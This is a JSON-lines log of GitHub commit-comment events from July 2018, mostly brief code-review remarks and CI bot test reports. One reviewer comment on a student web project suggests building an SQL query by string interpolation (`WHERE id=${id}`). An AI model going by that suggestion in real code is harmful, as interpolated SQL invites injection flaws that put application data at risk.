{"id":"7940606859","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29649041,"position":21,"line":77,"path":"src/tokentreeformatter/config/Config.hx","commit_id":"b6830fd0da1e89dcf6ef08af40f156eedc8ddbbf","created_at":"2018-07-09T23:22:00Z","updated_at":"2018-07-09T23:22:00Z","author_association":"MEMBER","body":"Why all the reflection?\r\n\r\nFor haxe-formatter I used [json2object](https://github.com/elnabo/json2object), which is pretty nice (gives nice error messages with positions, etc)."}},"created_at":"2018-07-09T23:22:00Z"}
{"id":"7940607046","type":"CommitCommentEvent","actor":{"login":"naltun"},"repo":{"name":"s0md3v/infinity"},"payload":{"comment":{"id":29649042,"position":null,"line":null,"path":null,"commit_id":"7f20dcdf49cabd5584ea9c46f5c817df27901302","created_at":"2018-07-09T23:22:03Z","updated_at":"2018-07-09T23:22:03Z","author_association":"NONE","body":"Awesome, thanks for the clarification bud. :+1: "}},"created_at":"2018-07-09T23:22:03Z"}
{"id":"7940626437","type":"CommitCommentEvent","actor":{"login":"MSP-Greg"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29649087,"position":null,"line":null,"path":null,"commit_id":"6c4e05d2d860b3955ffc537a33e3c325abc7fe00","created_at":"2018-07-09T23:28:46Z","updated_at":"2018-07-09T23:28:46Z","author_association":"NONE","body":"You're correct, but I'm also not sure about the rename.\r\n\r\nI just thought it's often considered good practice.  After all, with tests/benchmarks, something may SEGV..."}},"created_at":"2018-07-09T23:28:46Z"}
{"id":"7940627347","type":"CommitCommentEvent","actor":{"login":"aaronflipcause"},"repo":{"name":"aaronflipcause/ROI-flipcause-calculator"},"payload":{"comment":{"id":29649089,"position":null,"line":null,"path":null,"commit_id":"6fae42d3326e7b2c1aa4fa4fde28981daa0947b2","created_at":"2018-07-09T23:29:04Z","updated_at":"2018-07-09T23:29:04Z","author_association":"OWNER","body":"Config"}},"created_at":"2018-07-09T23:29:04Z"}
{"id":"7940631899","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29649102,"position":null,"line":null,"path":null,"commit_id":"3b7885fcd1384a40ed6982ab8d7937e236df2a81","created_at":"2018-07-09T23:30:37Z","updated_at":"2018-07-09T23:30:37Z","author_association":"COLLABORATOR","body":"<h3>[docs] update intro docs page (#2657)</h3>\n\nPreview: <strong><a href='https://18059-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18059-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18059-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T23:30:37Z"}
{"id":"7940631969","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29649103,"position":null,"line":null,"path":null,"commit_id":"1aa2012ff194bb970bb6ac4ce137874474acf6db","created_at":"2018-07-09T23:30:38Z","updated_at":"2018-07-09T23:30:38Z","author_association":"COLLABORATOR","body":"<h3>initial animation state depends on isOpen prop (#2644)</h3>\n\nPreview: <strong><a href='https://18058-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18058-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18058-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T23:30:38Z"}
{"id":"7940633929","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29649106,"position":null,"line":null,"path":null,"commit_id":"19612e23b94fae85bea4593eee6346025798abe4","created_at":"2018-07-09T23:31:16Z","updated_at":"2018-07-09T23:31:16Z","author_association":"COLLABORATOR","body":"<h3>re-license to BLUEPRINT LICENSE based on Apache 2.0 License (#2638)</h3>\n\nPreview: <strong><a href='https://18062-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18062-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18062-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T23:31:16Z"}
{"id":"7940641051","type":"CommitCommentEvent","actor":{"login":"ataylorme"},"repo":{"name":"ataylorme/Advanced-WordPress-on-Pantheon"},"payload":{"comment":{"id":29649113,"position":null,"line":null,"path":null,"commit_id":"a4c282cfb5ea25e01d87172ee6a48fac37e7789b","created_at":"2018-07-09T23:33:41Z","updated_at":"2018-07-09T23:33:41Z","author_association":"OWNER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-113-pantheon-wp-best-practices.pantheonsite.io/)\n\nCreated multidev environment [pr-113](https://dashboard.pantheon.io/sites/094f4627-a25e-4d60-8d5b-a3d99a7232bf#pr-113) for pantheon-wp-best-practices."}},"created_at":"2018-07-09T23:33:41Z"}
{"id":"7940641876","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649116,"position":18,"line":18,"path":"week-08/loginform/index.html","commit_id":"2d7b23c86460f5a412205866163f204ce55a7d28","created_at":"2018-07-09T23:33:56Z","updated_at":"2018-07-09T23:33:56Z","author_association":"NONE","body":"It's unnecessary to use div + span"}},"created_at":"2018-07-09T23:33:56Z"}
{"id":"7940643449","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649119,"position":110,"line":110,"path":"week-08/loginform/style.css","commit_id":"2d7b23c86460f5a412205866163f204ce55a7d28","created_at":"2018-07-09T23:34:29Z","updated_at":"2018-07-09T23:34:29Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-09T23:34:29Z"}
{"id":"7940651042","type":"CommitCommentEvent","actor":{"login":"ikzk"},"repo":{"name":"karoka/Phys514_HW2"},"payload":{"comment":{"id":29649135,"position":null,"line":null,"path":null,"commit_id":"0140be2c97d9fe07f1eeafe8380dfe5dc7c97e5c","created_at":"2018-07-09T23:37:10Z","updated_at":"2018-07-09T23:37:10Z","author_association":"NONE","body":"你改行学刑侦吧"}},"created_at":"2018-07-09T23:37:10Z"}
{"id":"7940655211","type":"CommitCommentEvent","actor":{"login":"joshcooper"},"repo":{"name":"puppetlabs/puppet"},"payload":{"comment":{"id":29649142,"position":null,"line":null,"path":null,"commit_id":"ee7cf4d28077be7d1bdbbe934ea012d41d33deff","created_at":"2018-07-09T23:38:37Z","updated_at":"2018-07-09T23:38:37Z","author_association":"MEMBER","body":"Sorry @jtappa I just noticed the ticket is targeting 5.5.x. Could you cherry-pick the commit and resubmit a PR against 5.5.x?"}},"created_at":"2018-07-09T23:38:37Z"}
{"id":"7940658005","type":"CommitCommentEvent","actor":{"login":"OzanAlpay"},"repo":{"name":"OzanAlpay/Allianz"},"payload":{"comment":{"id":29649146,"position":null,"line":null,"path":null,"commit_id":"8f0af5a2bd59b997d4963bd8fdc932577c7626f6","created_at":"2018-07-09T23:39:35Z","updated_at":"2018-07-09T23:39:35Z","author_association":"OWNER","body":"@HookToSky"}},"created_at":"2018-07-09T23:39:35Z"}
{"id":"7940658091","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29649147,"position":26,"line":159,"path":"src/main/java/com/ewp/crm/controllers/rest/ClientRestController.java","commit_id":"e4eb3378f81bd1e46d8e1436886ac1d6f4c0c9ef","created_at":"2018-07-09T23:39:37Z","updated_at":"2018-07-09T23:39:37Z","author_association":"NONE","body":"почему здесь таб? "}},"created_at":"2018-07-09T23:39:37Z"}
{"id":"7940659168","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29649148,"position":63,"line":85,"path":"src/main/java/com/ewp/crm/controllers/rest/StatusRestController.java","commit_id":"e4eb3378f81bd1e46d8e1436886ac1d6f4c0c9ef","created_at":"2018-07-09T23:39:58Z","updated_at":"2018-07-09T23:39:58Z","author_association":"NONE","body":"давно в Java такой кодестайл? "}},"created_at":"2018-07-09T23:39:58Z"}
{"id":"7940659489","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29649150,"position":64,"line":86,"path":"src/main/java/com/ewp/crm/controllers/rest/StatusRestController.java","commit_id":"e4eb3378f81bd1e46d8e1436886ac1d6f4c0c9ef","created_at":"2018-07-09T23:40:06Z","updated_at":"2018-07-09T23:40:06Z","author_association":"NONE","body":"ан-но"}},"created_at":"2018-07-09T23:40:06Z"}
{"id":"7940659811","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29649151,"position":85,"line":122,"path":"src/main/java/com/ewp/crm/controllers/rest/StatusRestController.java","commit_id":"e4eb3378f81bd1e46d8e1436886ac1d6f4c0c9ef","created_at":"2018-07-09T23:40:13Z","updated_at":"2018-07-09T23:40:13Z","author_association":"NONE","body":"омг"}},"created_at":"2018-07-09T23:40:13Z"}
{"id":"7940660159","type":"CommitCommentEvent","actor":{"login":"spaulaus"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":29649152,"position":27,"line":67,"path":"Analysis/Utkscan/core/source/DetectorDriver.cpp","commit_id":"51300030d1483a53ed04c43c97f962a34c1ba0ad","created_at":"2018-07-09T23:40:19Z","updated_at":"2018-07-09T23:40:19Z","author_association":"MEMBER","body":"You should throw here. It will make for clearer program execution. "}},"created_at":"2018-07-09T23:40:19Z"}
{"id":"7940661776","type":"CommitCommentEvent","actor":{"login":"jacksondavid87"},"repo":{"name":"jacksondavid87/ProjetoFinal"},"payload":{"comment":{"id":29649154,"position":null,"line":null,"path":null,"commit_id":"c57ea5495747ff2bc031e0065158f5b59489717d","created_at":"2018-07-09T23:40:57Z","updated_at":"2018-07-09T23:40:57Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-09T23:40:57Z"}
{"id":"7940662936","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29649160,"position":28,"line":37,"path":"src/main/java/com/ewp/crm/service/impl/SendNotificationServiceImpl.java","commit_id":"e4eb3378f81bd1e46d8e1436886ac1d6f4c0c9ef","created_at":"2018-07-09T23:41:23Z","updated_at":"2018-07-09T23:41:23Z","author_association":"NONE","body":"выстави в IDEA табуляцию вместо пробелов"}},"created_at":"2018-07-09T23:41:23Z"}
{"id":"7940666329","type":"CommitCommentEvent","actor":{"login":"vo333ua"},"repo":{"name":"vo333ua/clirescue"},"payload":{"comment":{"id":29649164,"position":8,"line":52,"path":"trackerapi/me.go","commit_id":"2711cce734421a78e37b68282121ea8683041538","created_at":"2018-07-09T23:42:37Z","updated_at":"2018-07-09T23:42:37Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-09T23:42:37Z"}
{"id":"7940666777","type":"CommitCommentEvent","actor":{"login":"vo333ua"},"repo":{"name":"vo333ua/clirescue"},"payload":{"comment":{"id":29649167,"position":9,"line":53,"path":"trackerapi/me.go","commit_id":"2711cce734421a78e37b68282121ea8683041538","created_at":"2018-07-09T23:42:48Z","updated_at":"2018-07-09T23:42:48Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-09T23:42:48Z"}
{"id":"7940667332","type":"CommitCommentEvent","actor":{"login":"13romeofox"},"repo":{"name":"nteract/hydrogen"},"payload":{"comment":{"id":29649169,"position":4,"line":4,"path":"static/animate-logo.svg","commit_id":"aa93bc6c7a75d21ca2d82d4882321118d05747fa","created_at":"2018-07-09T23:43:01Z","updated_at":"2018-07-09T23:43:01Z","author_association":"NONE","body":"chill"}},"created_at":"2018-07-09T23:43:01Z"}
{"id":"7940669146","type":"CommitCommentEvent","actor":{"login":"vo333ua"},"repo":{"name":"vo333ua/clirescue"},"payload":{"comment":{"id":29649172,"position":4,"line":28,"path":"main.go","commit_id":"2711cce734421a78e37b68282121ea8683041538","created_at":"2018-07-09T23:43:41Z","updated_at":"2018-07-09T23:43:41Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-09T23:43:41Z"}
{"id":"7940669399","type":"CommitCommentEvent","actor":{"login":"vo333ua"},"repo":{"name":"vo333ua/clirescue"},"payload":{"comment":{"id":29649173,"position":5,"line":29,"path":"main.go","commit_id":"2711cce734421a78e37b68282121ea8683041538","created_at":"2018-07-09T23:43:46Z","updated_at":"2018-07-09T23:43:46Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-09T23:43:46Z"}
{"id":"7940670138","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649174,"position":21,"line":21,"path":"week-08/day-03/buttondisable/script.js","commit_id":"62a1e8d5ae4d68aa4b7422fc78aa01d8baed102e","created_at":"2018-07-09T23:44:02Z","updated_at":"2018-07-09T23:44:02Z","author_association":"NONE","body":"I really like these comment lines. Just one fix: use a space after the `//`\r\n`// Enable signup if cat or dog is checked` 👌 "}},"created_at":"2018-07-09T23:44:02Z"}
{"id":"7940673926","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649179,"position":62,"line":62,"path":"week-08/day-03/buttondisable/script.js","commit_id":"62a1e8d5ae4d68aa4b7422fc78aa01d8baed102e","created_at":"2018-07-09T23:45:19Z","updated_at":"2018-07-09T23:45:19Z","author_association":"NONE","body":"What about a shorthand here?\r\n`dogRadio.checked && noRadio.checked ? alert(sadAlert) : alert(normalAlert);`"}},"created_at":"2018-07-09T23:45:19Z"}
{"id":"7940677969","type":"CommitCommentEvent","actor":{"login":"jlblancoc"},"repo":{"name":"MRPT/mrpt-web"},"payload":{"comment":{"id":29649190,"position":5,"line":125,"path":"apps/rawlog-viewer/main_display_processor.cpp","commit_id":"89018706390beb3c4cc03e2bd92a498f966415e2","created_at":"2018-07-09T23:46:39Z","updated_at":"2018-07-09T23:46:39Z","author_association":"MEMBER","body":"@jolting , @rachit173 : As a C++ programmer, I'm astonished: there is really no way to get the length() of `laserScan.xs` from the JS side?"}},"created_at":"2018-07-09T23:46:39Z"}
{"id":"7940677982","type":"CommitCommentEvent","actor":{"login":"MrL0"},"repo":{"name":"JMccormick264/PPAppsIPARepo"},"payload":{"comment":{"id":29649191,"position":null,"line":null,"path":null,"commit_id":"2fac2321eb296f813c5ed6c9f14b15b4f435cfc2","created_at":"2018-07-09T23:46:40Z","updated_at":"2018-07-09T23:46:40Z","author_association":"NONE","body":"Are you planning to add Moviebox back?"}},"created_at":"2018-07-09T23:46:40Z"}
{"id":"7940679354","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649194,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T23:47:08Z","updated_at":"2018-07-09T23:47:08Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-09T23:47:08Z"}
{"id":"7940680768","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649196,"position":27,"line":27,"path":"week-08/day-02/candyshop/script.js","commit_id":"41eedfeb9793f346c377f5f291c0f63d5402559f","created_at":"2018-07-09T23:47:38Z","updated_at":"2018-07-09T23:47:38Z","author_association":"NONE","body":"Use built-in array functions next time. (forEach)"}},"created_at":"2018-07-09T23:47:38Z"}
{"id":"7940681558","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649197,"position":80,"line":80,"path":"week-08/day-02/candyshop/script.js","commit_id":"41eedfeb9793f346c377f5f291c0f63d5402559f","created_at":"2018-07-09T23:47:54Z","updated_at":"2018-07-09T23:47:54Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-09T23:47:54Z"}
{"id":"7940683401","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649200,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T23:48:33Z","updated_at":"2018-07-09T23:48:33Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T23:48:33Z"}
{"id":"7940685383","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649211,"position":3,"line":3,"path":"week-08/reddit-project/.gitignore","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-09T23:49:15Z","updated_at":"2018-07-09T23:49:15Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-09T23:49:15Z"}
{"id":"7940686498","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649213,"position":7,"line":7,"path":"week-08/reddit-project/source/server.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-09T23:49:38Z","updated_at":"2018-07-09T23:49:38Z","author_association":"NONE","body":"😄 "}},"created_at":"2018-07-09T23:49:38Z"}
{"id":"7940688437","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649215,"position":21,"line":21,"path":"week-08/reddit-project/source/routes.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-09T23:50:17Z","updated_at":"2018-07-09T23:50:17Z","author_association":"NONE","body":"replace `+` to `,`"}},"created_at":"2018-07-09T23:50:17Z"}
{"id":"7940689729","type":"CommitCommentEvent","actor":{"login":"warrofua"},"repo":{"name":"viktorgullmark/exile-party"},"payload":{"comment":{"id":29649221,"position":null,"line":null,"path":null,"commit_id":"1d62cd49ba70e66d3902bcafe723542e76226078","created_at":"2018-07-09T23:50:46Z","updated_at":"2018-07-09T23:50:46Z","author_association":"NONE","body":"Thank you!  (<3 discord guy who reported the bug)"}},"created_at":"2018-07-09T23:50:46Z"}
{"id":"7940691310","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649223,"position":35,"line":35,"path":"week-08/reddit-project/source/routes.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-09T23:51:18Z","updated_at":"2018-07-09T23:51:18Z","author_association":"NONE","body":"Unnecessary empty line"}},"created_at":"2018-07-09T23:51:18Z"}
{"id":"7940702071","type":"CommitCommentEvent","actor":{"login":"simsim314"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29649247,"position":null,"line":null,"path":null,"commit_id":"aab4ffd664b77bd6afb85e8d5660da66a4bf1776","created_at":"2018-07-09T23:55:10Z","updated_at":"2018-07-09T23:55:10Z","author_association":"CONTRIBUTOR","body":"I would add a nuance here - that when we learn the language and meaning of words - with learn to generalize our experience. For example when someone says \"pain\" he usually refers to his pain, if his experience of pain is somewhat different than most of humans, he will probably get a different \"meaning\". The best example here is colors explained to a blind person, and in some extent we're all blind to subjective experiences of others. \r\n\r\nAnother point is that of trying to figure out what other people think or feel. When you see their facial expressions, you can still only refer to facial expressions you associate with some internal feeling you had. It's the same sort of blindness. \r\n\r\nThe mathematical reference is living on some manifold - which built of all your experiences, and trying to refer to other experiences. Blind people is a very strong example of people who're obviously lacking some reference experiences of colors, but we're basically lacking any nuance of other counssenesses. \r\n\r\nNow the other point is that we can learn and modify our perception by talking to other people, when our spaces are not completely orthogonal we can share and express similar subjective feeling and find differences as well. Basically we can decompose our experiences in the vector space of other person. \r\n\r\nAnother point which is maybe not relevant here is that we can formulate this as \"native language\" which is the building blocks of our consciousness, and we can ask is it possible to modify this language at all? Does our \"native\" language is inherent, or maybe it's learned from our culture or maybe both (i.e. culture can influence at some level our internal building blocks). For example does mathematical language is just another language we learned or do we become \"one\" with the language at some level. "}},"created_at":"2018-07-09T23:55:10Z"}
{"id":"7940702144","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"kartik-karz/Python-Android-template"},"payload":{"comment":{"id":29649248,"position":18,"line":15,"path":"{{ cookiecutter.dir_name }}/build.gradle","commit_id":"d54b3ca4dd30cd5cdaab93ae9236d9acc2f60bd1","created_at":"2018-07-09T23:55:11Z","updated_at":"2018-07-09T23:55:11Z","author_association":"NONE","body":"Cosmetic, but this is really odd indentation..."}},"created_at":"2018-07-09T23:55:11Z"}
{"id":"7940704303","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649256,"position":50,"line":50,"path":"week-08/reddit-project/source/routes.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-09T23:55:55Z","updated_at":"2018-07-09T23:55:55Z","author_association":"NONE","body":"Use `?` style queries. Ask me if you need help"}},"created_at":"2018-07-09T23:55:55Z"}
{"id":"7940704354","type":"CommitCommentEvent","actor":{"login":"Etothepowerof26"},"repo":{"name":"GitPaulo/PMETASTRUCT"},"payload":{"comment":{"id":29649257,"position":null,"line":null,"path":null,"commit_id":"a3b392bc3bc444da788bba365ad7b88494923413","created_at":"2018-07-09T23:55:56Z","updated_at":"2018-07-09T23:55:56Z","author_association":"NONE","body":"fat cat :D"}},"created_at":"2018-07-09T23:55:56Z"}
{"id":"7940707729","type":"CommitCommentEvent","actor":{"login":"anantoghosh"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29649267,"position":5,"line":33,"path":"packages/gatsby-plugin-less/src/gatsby-node.js","commit_id":"a7a892dbec7545d4379c96fd01825a54cb2cf575","created_at":"2018-07-09T23:57:12Z","updated_at":"2018-07-09T23:57:12Z","author_association":"NONE","body":"@jquense This will evaluate to `false` when isSSR is `true`. use: [ false ] is invalid.\r\nThe plugin has started throwing this error:\r\n```\r\nDetails:\r\nWebpackOptionsValidationError: Invalid configuration object. Webpack has been initialised using a configuration   object that does not match the API schema.\r\n   - configuration.module.rules[6].oneOf[0].use should be one of these:\r\n     non-empty string | function | object { loader?, options?, ident?, query? } | function | [non-empty string |\r\n  function | object { loader?, options?, ident?, query? }]\r\n     -> Modifiers applied to the module when rule is matched\r\n      * configuration.module.rules[6].oneOf[0].use should be a string.\r\n      * configuration.module.rules[6].oneOf[0].use should be an instance of function\r\n```"}},"created_at":"2018-07-09T23:57:12Z"}
{"id":"7940708818","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"kartik-karz/Python-Android-template"},"payload":{"comment":{"id":29649273,"position":64,"line":48,"path":"{{ cookiecutter.dir_name }}/build.gradle","commit_id":"d54b3ca4dd30cd5cdaab93ae9236d9acc2f60bd1","created_at":"2018-07-09T23:57:34Z","updated_at":"2018-07-09T23:57:34Z","author_association":"NONE","body":"What's the underlying reason for this bump? I'm hesitant to bump the SDK version if it's going to increase the minimum supported API version, because Android has a very long tail of old devices."}},"created_at":"2018-07-09T23:57:34Z"}
{"id":"7940709310","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649275,"position":127,"line":127,"path":"week-08/reddit-project/source/routes.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-09T23:57:47Z","updated_at":"2018-07-09T23:57:47Z","author_association":"NONE","body":"If the `id` field in your database is a primary key, and you set an auto_increment for that field, than it's a number. --> simply use ``WHERE id=${id};`;``, without the quotes"}},"created_at":"2018-07-09T23:57:47Z"}
{"id":"7940709770","type":"CommitCommentEvent","actor":{"login":"ahwanpandey"},"repo":{"name":"PoisonAlien/maftools"},"payload":{"comment":{"id":29649277,"position":48,"line":138,"path":"R/dashboard.R","commit_id":"3c09ec61c710c458cef23c4fddfda68f7b448234","created_at":"2018-07-09T23:57:57Z","updated_at":"2018-07-09T23:57:57Z","author_association":"NONE","body":"should be maf?"}},"created_at":"2018-07-09T23:57:57Z"}
{"id":"7940710094","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"kartik-karz/Python-Android-template"},"payload":{"comment":{"id":29649278,"position":81,"line":74,"path":"{{ cookiecutter.dir_name }}/build.gradle","commit_id":"d54b3ca4dd30cd5cdaab93ae9236d9acc2f60bd1","created_at":"2018-07-09T23:58:05Z","updated_at":"2018-07-09T23:58:05Z","author_association":"NONE","body":"Is this ':25.1.1' version compatible with the target SDK?"}},"created_at":"2018-07-09T23:58:05Z"}
{"id":"7940710316","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi2"},"payload":{"comment":{"id":29649280,"position":null,"line":null,"path":null,"commit_id":"fc0b1876e8a74216ff820883087e8da5917f9c74","created_at":"2018-07-09T23:58:10Z","updated_at":"2018-07-09T23:58:10Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi2/6990ba2b-f75f-4f9c-baae-7a1a8bef6542\n"}},"created_at":"2018-07-09T23:58:10Z"}
{"id":"7940711328","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649282,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-09T23:58:32Z","updated_at":"2018-07-09T23:58:32Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2785 of 2932 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 133 tests had: EIO diffs.\n * 131 tests had: Table big diffs.\n * 5 tests had: ESO small diffs.\n * 4 tests had: MTR small diffs.\n * 16 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 4 tests had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 609\n * Failed: 16\n\nregression Test Summary\n * Passed: 492\n * Failed: 131\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.99%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T23:58:32Z"}
{"id":"7935159300","type":"CommitCommentEvent","actor":{"login":"jlstevens"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29635988,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-09T03:02:50Z","updated_at":"2018-07-09T03:02:50Z","author_association":"CONTRIBUTOR","body":"I copied this [example](https://github.com/pyviz/pyviz/blob/master/.travis.yml#L69) that @ceball referred me to though I suppose it might be the wrong section. I'm a little surprised though as @philippjfr said that setting ``fqdn`` fixed the clobbering of CNAME for hvplot and that is also specified in the ``deploy`` section as you can see [here](https://github.com/pyviz/hvplot/blob/master/.travis.yml#L94)."}},"created_at":"2018-07-09T03:02:50Z"}
